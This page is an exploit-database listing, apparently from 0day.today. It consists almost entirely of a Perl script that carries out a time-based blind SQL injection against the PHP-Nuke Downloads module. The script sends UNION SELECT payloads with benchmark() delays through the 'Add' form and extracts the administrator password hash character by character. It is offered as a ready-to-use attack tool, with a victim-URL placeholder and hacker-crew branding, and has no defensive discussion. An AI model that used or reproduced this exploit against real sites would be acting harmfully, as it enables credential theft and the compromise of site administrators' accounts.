[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection Exploit

Author
Dr.0rYX
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-15481
Category
web applications
Date add
25-02-2011
Platform
php
#!/usr/bin/perl
#[0-Day] PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection Exploit
#Created: 2011.01.04 
#Author/s: Dr.0rYX and Cr3w-DZ
#Greetings To: WWW.gaza-hacker.net

####################################################################################################
#           _______       ___________.__                     ___________      .__                  #
#      ____ \   _  \______\__    ___/|  |__           _____  \_   _____/______|__| ____ _____      #
#     /    \/  /_\  \_  __ \|    |   |  |  \   ______ \__  \  |    __) \_  __ \  |/ ___\\__  \     #
#    |   |  \  \_/   \  | \/|    |   |   Y  \ /_____/  / __ \_|     \   |  | \/  \  \___ / __ \_   #
#    |___|  /\_____  /__|   |____|   |___|  /         (____  /\___  /   |__|  |__|\___  >____  /   #
#         \/       \/                     \/               \/     \/                  \/     \/    #
#                                      .__  __             __                                      #
#      ______ ____   ____  __ _________|__|/  |_ ___.__. _/  |_  ____ _____    _____               #
#     /  ___// __ \_/ ___\|  |  \_  __ \  \   __<   |  | \   __\/ __ \\__  \  /     \              #
#     \___ \\  ___/\  \___|  |  /|  | \/  ||  |  \___  |  |  | \  ___/ / __ \|  Y Y  \             #
#    /____  >\___  >\___  >____/ |__|  |__||__|  / ____|  |__|  \___  >____  /__|_|  /             #
#         \/     \/     \/                       \/                 \/     \/      \/              #
#                                                        Pr!v8 Expl0iT AND t00l **                 #                                                          #                                                                                                  #     
#                                      ALGERIAN HACKERS                                            #      
#################################- NORTH-AFRICA SECURITY TEAM -#####################################

use strict;
use warnings;

use LWP::UserAgent;
use HTTP::Cookies;
use HTTP::Headers;
use Time::HiRes;

my $Victime  = shift or &usage;
my $Hash = "";
my ($Referer,$Time,$Response);
my ($Start,$End);
my @chars = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);
my $HostName = "http://www.victime_site.org/path/"; #Insert Victime Web Site Link
my $Method = HTTP::Request->new(POST => $HostName.'modules.php?name=Downloads&d_op=Add');
my $Cookies = new HTTP::Cookies;
my $UserAgent = new LWP::UserAgent(
			agent => 'Mozilla/5.0',
			max_redirect => 0,
			cookie_jar => $Cookies,
			default_headers => HTTP::Headers->new,
		) or die $!;
my $NAST = "http://www.gaza-hacker.net/";
my $DefaultTime = request($NAST);
my $Post;

sub Blind_SQL_Jnjection {
	my ($dec,$hex,$Victime) = @_;
	return "http://www.gaza-hacker.net/' UNION/**/SELECT IF(SUBSTRING(pwd,${dec},1)=CHAR(${hex}),benchmark(250000000,CHAR(0)),0) FROM nuke_authors WHERE aid='${Victime}";
}

for(my $I=1; $I<=32; $I++){ #N Hash characters
	for(my $J=0; $J<=15; $J++){ #0 -> F
		$Post = Blind_SQL_Jnjection($I,$chars[$J],$Victime);
		$Time = request($Post);
		sleep(3);
		refresh($HostName, $DefaultTime, $chars[$J], $Hash, $Time, $I);
		if ($Time > 4) {
			$Time = request($Post);
			refresh($HostName, $DefaultTime, $chars[$J], $Hash, $Time, $I);
			if ($Time > 4) {
				syswrite(STDOUT,chr($chars[$J]));
				$Hash .= chr($chars[$J]);
				$Time = request($Post);
				refresh($HostName, $DefaultTime, $chars[$J], $Hash, $Time, $I);
				last;
			}
		}
	}
	if($I == 1 && length $Hash < 1 && !$Hash){
		print " * Exploit Failed                                       *\n";
		print " -------------------------------------------------------- \n";
		exit;
	}
	if($I == 32){
		print " * Exploit Successfully Executed                        *\n";
		print " -------------------------------------------------------- \n";
		system("pause");
	}
}

sub request{
	$Post = $_[0];
	$Start = Time::HiRes::time();
	my $Response = $UserAgent->post($HostName.'modules.php?name=Downloads&d_op=Add', {
					title => "Dr.0rYX and Cr3w-DZ",
					url => $Post,
					description => "NAST Crew",
					auth_name => "Dr.0rYX and Cr3w-DZ",
					email => "sniper-dz\@hotmail.de and crew\@hotmail.de",
					filesize => "1024",
					version => "1",
					homepage => "http://www.gaza-hacker.net/",
					d_op => "Add"
				}, 
				Referer => $HostName.'modules.php?name=Downloads&d_op=Add');
	$Response->is_success() or die "$HostName : ", $Response->message, "\n";
	$End = Time::HiRes::time();
	$Time = $End - $Start;
	return $Time;
}

sub usage {
	system("cls");
	{
		print " \n [0-Day] PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection Exploit\n";
		print " -------------------------------------------------------- \n";
		print " * USAGE:                                               *\n";
		print " * cd [Local Disk]:\\[Directory Of Exploit]\\             *\n";
		print " * perl name_exploit.pl [victime]                       *\n";
		print " -------------------------------------------------------- \n";
		print " *          Powered By Dr.0rYX and Cr3w-DZ              *\n";
		print " *        www.gaza-hacker.net - NAST CREW               *\n";
		print " ------------------------------------------------------- \n";
	};
	exit;
}

sub refresh {
	system("cls");
	{
		print " \n [0-Day] PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection Exploit\n";
		print " -------------------------------------------------------- \n";
		print " * USAGE:                                               *\n";
		print " * cd [Local Disk]:\\[Directory Of Exploit]\\             *\n";
		print " * perl name_exploit.pl [victime]                       *\n";
		print " -------------------------------------------------------- \n";
		print " *          Powered By Dr.0rYX and Cr3w-DZ              *\n";
		print " *         www.gaza-hacker.net - NAST CREW              *\n";
		print " ------------------------------------------------------- \n";
	};
	print " * Victime Site: " . $_[0] . "\n";
	print " * Default Time: " . $_[1] . " seconds\n";
	print " * BruteForcing Hash: " . chr($_[2]) . "\n";
	print " * BruteForcing N Char Hash: " . $_[5] . "\n";
	print " * SQL Time: " . $_[4] . " seconds\n";
	print " * Hash: " . $_[3] . "\n";
}

#NORTH-AFRICA SECURITY TEAM



#  0day.today [2024-12-24]  #